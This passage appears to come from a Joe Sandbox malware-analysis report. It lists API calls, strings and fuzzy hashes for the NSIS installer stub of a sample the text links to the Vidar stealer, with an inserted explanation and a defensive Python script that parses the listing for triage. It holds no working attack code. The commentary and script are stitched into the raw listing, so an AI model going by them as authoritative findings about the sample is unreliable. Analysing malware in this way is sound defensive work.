                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                        • String ID: verifying installer: %d%%
                                                                                        • API String ID: 1451636040-82062127
                                                                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                        • wsprintfW.USER32 ref: 00404457
                                                                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                        • String ID: %u.%u%s%s$@rD
                                                                                        • API String ID: 3540041739-1813061909
                                                                                        • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                        • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                        APIs
                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                        • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                        • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Char$Next$Prev
                                                                                        • String ID: *?|<>/":
                                                                                        • API String ID: 589700163-165019052
                                                                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                        APIs
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1912718029-0
                                                                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                        • String ID:
                                                                                        • API String ID: 1849352358-0
                                                                                        • Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                        • Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
                                                                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                        APIs
                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Timeout
                                                                                        • String ID: !
                                                                                        • API String ID: 1777923405-2657877971
                                                                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                                        APIs
                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                        • API String ID: 1697273262-1764544995
                                                                                        • Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                                        • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                                        • Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
                                                                                        • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
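The literal strings in the function blocks above (Exec: command="%s", DeleteRegKey: "%s\%s", DeleteRegValue: "%s\%s" "%s", RMDir: RemoveDirectory("%s"), verifying installer: %d%%, and the filename-validation set *?|<>/":) are the log-format strings of the NSIS installer stub, so these functions are the installer wrapper around the sample rather than the Vidar payload itself. When working through a long function listing like this one it helps to parse the blocks into records and tag the ones that carry stub strings so review time goes to the remaining functions. The following is an added example written for this report, not Joe Sandbox code: it parses the "APIs / Strings / Similarity" text as it appears above into one record per function. The sample input is constructed from two blocks of this page (indentation and link residue removed), and the NSIS_STUB_MARKERS list is my own assumption about which string prefixes identify stub code.

```python
"""Parse Joe Sandbox per-function analysis blocks and tag installer-stub code.

Added example for this report; it is not Joe Sandbox code. It reads the
"APIs / Strings / Similarity" text blocks as shown in the report and returns
one record per function.
"""
import re
from collections import namedtuple
from dataclasses import dataclass, field

ApiCall = namedtuple("ApiCall", "name module args ref subcall")
StringRef = namedtuple("StringRef", "text ref")

# "• Name.MODULE(args), ref: ADDR", "• Name.MODULE ref: ADDR", and
# "• Part of subcall function ADDR: Name.MODULE(args), ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# "• text, xrefs: ADDR"
STRING_RE = re.compile(r"^\s*•\s*(?P<text>.*),\s*xrefs:\s*(?P<ref>[0-9A-F]{8})\s*$")
# "• Key: value" lines of the Similarity section
FIELD_RE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*)$"
)
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Assumed marker list (mine, not from the report): prefixes of the format
# strings the NSIS installer stub emits through its internal log_printf.
NSIS_STUB_MARKERS = ("Exec: ", "DeleteRegKey: ", "DeleteRegValue: ",
                     "RMDir: ", "verifying installer:")

# Constructed sample: two function blocks copied from this report's text.
SAMPLE = """\
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
• GetMessagePos.USER32 ref: 00404871
• ScreenToClient.USER32(?,?), ref: 00404889
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
APIs
  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
• RegCloseKey.ADVAPI32(00000000), ref: 0040282E
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
Strings
• DeleteRegValue: "%s\\%s" "%s", xrefs: 00402820
• DeleteRegKey: "%s\\%s", xrefs: 00402843
Memory Dump Source
Similarity
• API ID: CloseDeleteOpenValuelstrlenwvsprintf
• String ID: DeleteRegKey: "%s\\%s"$DeleteRegValue: "%s\\%s" "%s"
• Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
"""


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)


def parse_blocks(text):
    """Split report text into FunctionBlock records; a block starts at 'APIs'."""
    blocks, cur, section = [], None, None
    for line in text.splitlines():
        head = line.strip()
        if head == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            section = "APIs"
            continue
        if head in SECTION_HEADERS:
            section = head
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                cur.strings.append(StringRef(m["text"], m["ref"]))
        elif section == "Similarity":
            m = FIELD_RE.match(line)
            if m:
                cur.fields[m["key"]] = m["val"]
    return blocks


def api_names(block):
    """Distinct API names the function calls directly (subcall lines excluded)."""
    return sorted({a.name for a in block.apis if a.subcall is None})


def classify(block):
    """'nsis-stub' when any referenced string starts with an NSIS stub marker."""
    texts = [s.text for s in block.strings] + block.fields.get("String ID", "").split("$")
    if any(t.startswith(mk) for t in texts for mk in NSIS_STUB_MARKERS):
        return "nsis-stub"
    return "unclassified"


def triage(text):
    """One summary row per function: tag, direct APIs, fuzzy hash, call-site count."""
    return [{"tag": classify(b), "apis": api_names(b),
             "hash": b.fields.get("Instruction Fuzzy Hash", ""),
             "call_sites": len(b.apis)} for b in parse_blocks(text)]


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run the script as-is to see the two sample rows; to use it on a full report, paste the function listing into a file and pass its contents to triage(). The classifier is deliberately conservative: it only tags a function when one of its own string references matches a marker, so UI helpers that carry no log string (the first sample block) stay "unclassified" and the reviewer decides. The Instruction Fuzzy Hash is kept in each row so stub functions identified once can be matched across reports of other NSIS-wrapped samples.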
APIs
• IsWindowVisible.USER32(?), ref: 00404902
• CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID: $@rD
• API String ID: 3748168415-881980237
APIs
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
  • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
  • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
• lstrlenW.KERNEL32 ref: 004026B4
• lstrlenW.KERNEL32(00000000), ref: 004026C1
• SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
• String ID: CopyFiles "%s"->"%s"
• API String ID: 2577523808-3778932970
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: lstrcatwsprintf
• String ID: %02x%c$...
• API String ID: 3065427908-1057055748
APIs
• OleInitialize.OLE32(00000000), ref: 00405057
  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
• OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: InitializeMessageSendUninitializelstrlenwvsprintf
• String ID: Section: "%s"$Skipping section: "%s"
• API String ID: 2266616436-4211696005
APIs
• GetDC.USER32(?), ref: 00402100
• GetDeviceCaps.GDI32(00000000), ref: 00402107
• MulDiv.KERNEL32(00000000,00000000), ref: 00402117
  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
• CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectVersionwsprintf
• String ID:
• API String ID: 1599320355-0
APIs
  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
• lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
• lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
• lstrcpynW.KERNEL32(?,?,?), ref: 00407261
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
• API String ID: 512980652-315105994
APIs
• DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
• GetProcAddress.KERNEL32(?,00000000), ref: 00406395
• GlobalFree.KERNEL32(00000000), ref: 0040639E
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• String ID:
• API String ID: 2883127279-0
APIs
• ShowWindow.USER32(00000000,00000000), ref: 0040219F
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
• EnableWindow.USER32(00000000,00000000), ref: 004021AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                        • String ID: HideWindow
                                                                                        • API String ID: 1249568736-780306582
                                                                                        • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                                        • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                        • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                                        • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                        APIs
                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                        • String ID: !N~
                                                                                        • API String ID: 623250636-529124213
                                                                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                        Strings
                                                                                        • Error launching installer, xrefs: 00405C48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
